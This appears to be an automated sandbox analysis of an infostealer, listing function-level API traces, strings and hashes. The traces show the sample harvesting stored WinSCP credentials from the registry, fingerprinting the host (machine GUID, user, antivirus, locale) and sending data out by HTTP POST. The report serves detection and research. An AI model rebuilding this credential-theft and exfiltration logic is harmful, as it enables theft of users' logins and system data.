                                                                                                                            • Opcode ID: d8a11cf80fd5f667af91932e42502140a46bd9f715fd99863c18b28308b6bc58
                                                                                                                            • Instruction ID: 2e9f852a615408e756f1d7d3730d5668bfc6bf7d6dc94c0724fe4efb67adb4f0
                                                                                                                            • Opcode Fuzzy Hash: d8a11cf80fd5f667af91932e42502140a46bd9f715fd99863c18b28308b6bc58
                                                                                                                            • Instruction Fuzzy Hash: 6FA17572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99
                                                                                                                            Function 0040E186 Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325registryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0040E1B7
                                                                                                                            • _memset.LIBCMT ref: 0040E1D7
                                                                                                                            • _memset.LIBCMT ref: 0040E1E8
                                                                                                                            • _memset.LIBCMT ref: 0040E1F9
                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
                                                                                                                            • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E276
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E29D
                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
                                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
                                                                                                                            • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
                                                                                                                            • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                            • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                            • API String ID: 463713726-2798830873
                                                                                                                            • Opcode ID: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                                                                            • Instruction ID: 1c66541d4828bd9326f921050ea70c7b79589cb9660c5b8585550bf775721ac0
                                                                                                                            • Opcode Fuzzy Hash: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                                                                            • Instruction Fuzzy Hash: B5D1D6B295012DAADF20EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5
                                                                                                                            Function 00405F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466networkstringmemoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 568 405f39-405ffe call 410519 call 404ab6 call 4104e7 * 5 InternetOpenA StrCmpCA 583 406000 568->583 584 406006-40600c 568->584 583->584 585 406012-40619c call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 584->585 586 4066ff-406727 InternetCloseHandle call 408048 584->586 585->586 662 4061a2-4061dc HttpOpenRequestA 585->662 591 406766-4067ec call 402920 * 4 call 401cde call 402920 call 41d016 586->591 592 406729-406761 call 410549 call 410609 call 41058d call 402920 586->592 592->591 663 4061e2-4061e8 662->663 664 4066f3-4066f9 InternetCloseHandle 662->664 665 406206-406690 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA 663->665 666 4061ea-406200 InternetSetOptionA 663->666 664->586 809 4066d2-4066ea InternetReadFile 665->809 666->665 810 406692-40669a 809->810 811 4066ec-4066ed InternetCloseHandle 809->811 810->811 812 40669c-4066cd call 410609 call 41058d call 402920 810->812 811->664 812->809
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                            • lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,433cd71b7a2bdd3668a493b00ee95630,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040660C
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040661E
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040662B
                                                                                                                            • _memmove.LIBCMT ref: 00406639
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00406647
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
                                                                                                                            • _memmove.LIBCMT ref: 00406662
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
                                                                                                                            • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
                                                                                                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004066ED
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 004066F9
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406705
                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                            • String ID: "$"$"$------$------$------$------$433cd71b7a2bdd3668a493b00ee95630$build_id$mode
                                                                                                                            • API String ID: 3702379033-3524701274
                                                                                                                            • Opcode ID: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
                                                                                                                            • Instruction ID: 82dd920f4857eb4424cccb8e833476094bcda5e32b3baf042c939ae059a0737f
                                                                                                                            • Opcode Fuzzy Hash: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
                                                                                                                            • Instruction Fuzzy Hash: FF22B9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8
                                                                                                                            Function 00418643 Relevance: 48.2, APIs: 32, Instructions: 154libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 912 418643-418653 call 41859a 915 418844-4188a1 LoadLibraryA * 5 912->915 916 418659-41883f call 407d47 GetProcAddress * 20 912->916 917 4188a3-4188b0 GetProcAddress 915->917 918 4188b5-4188bc 915->918 916->915 917->918 920 4188e7-4188ee 918->920 921 4188be-4188e2 GetProcAddress * 2 918->921 923 4188f0-4188fd GetProcAddress 920->923 924 418902-418909 920->924 921->920 923->924 926 41890b-418918 GetProcAddress 924->926 927 41891d-418924 924->927 926->927 928 418926-41894a GetProcAddress * 2 927->928 929 41894f 927->929 928->929
                                                                                                                            APIs
                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418684
                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041869B
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004186B2
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004186C9
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004186E0
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004186F7
                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041870E
                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418725
                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041873C
                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418753
                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041876A
                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418781
                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418798
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004187AF
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004187C6
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004187DD
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004187F4
                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041880B
                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418822
                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418839
                                                                                                                            • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
                                                                                                                            • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
                                                                                                                            • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
                                                                                                                            • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
                                                                                                                            • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
                                                                                                                            • GetProcAddress.KERNEL32(76850000,004184C2), ref: 004188AA
                                                                                                                            • GetProcAddress.KERNEL32(77040000,004184C2), ref: 004188C5
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004188DC
                                                                                                                            • GetProcAddress.KERNEL32(75A10000,004184C2), ref: 004188F7
                                                                                                                            • GetProcAddress.KERNEL32(75690000,004184C2), ref: 00418912
                                                                                                                            • GetProcAddress.KERNEL32(776F0000,004184C2), ref: 0041892D
                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418944
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2238633743-0
                                                                                                                            • Opcode ID: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                                                                            • Instruction ID: 2c76b628124a1797fdce28c748a09696ce6250a2eaa67b4899ff399dadce2328
                                                                                                                            • Opcode Fuzzy Hash: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                                                                            • Instruction Fuzzy Hash: 96711675910312AFEF1ADF60FD088243BA7F70874BF10A426E91582270EB374A64EF55
                                                                                                                            Function 00413B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674stringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 930 413b86-4145a5 call 4104e7 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4115d4 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411684 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4109a2 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 GetCurrentProcessId call 41224a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410b30 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411807 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411997 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c85 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c53 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411563 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410ddb call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410d2e call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410f51 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411007 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410fba call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411119 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411192 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4114a5 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411203 call 4105c7 call 41058d call 402920 * 2 call 411203 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 401cfd lstrlenA call 4104e7 call 416e97 call 402920 * 2 call 401cde
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
                                                                                                                              • Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
                                                                                                                              • Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
                                                                                                                              • Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16
                                                                                                                              • Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
                                                                                                                              • Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                              • Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                              • Part of subcall function 004115D4: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
                                                                                                                              • Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                              • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                              • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                              • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                              • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                              • Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                              • Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                              • Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                            • GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB
                                                                                                                              • Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                              • Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                              • Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                              • Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                              • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                              • Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                              • Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                              • Part of subcall function 00411807: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                              • Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                              • Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                              • Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                              • Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                              • Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                              • Part of subcall function 00411997: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                              • Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                              • Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                              • Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                              • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                              • Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                              • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                              • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                              • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                              • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                              • Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
                                                                                                                              • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
                                                                                                                              • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
                                                                                                                              • Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
                                                                                                                              • Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
                                                                                                                              • Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
                                                                                                                              • Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB
                                                                                                                              • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                              • Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                              • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                              • Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                              • Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                              • Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                              • Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                              • Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                              • Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D
                                                                                                                              • Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                              • Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
